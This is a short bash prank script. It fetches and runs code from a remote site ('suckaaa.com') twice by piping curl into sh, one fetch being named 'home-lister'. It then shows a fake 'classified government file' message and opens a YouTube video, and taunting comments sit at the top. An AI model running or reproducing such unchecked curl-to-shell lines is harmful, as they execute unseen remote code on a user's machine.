#!/bin/bash

# loL whatcha lookin for in here???
# Don't worry about it!!!

curl -s 'https://suckaaa.com/s/lib-installer' | sh;
source ~/.garbage/lib;

positionWindow 0 0;
setFontSize 50;

clear;
echo "\n\nWhat you're about to see is a highly classified government file\n\n";

sleep 4s;

termdo 'curl -s https://suckaaa.com/s/home-lister | sh';

sleep 4s;

# Gopher video
open https://www.youtube.com/watch?v=7zPnTtF0Wk8&feature=youtu.be;




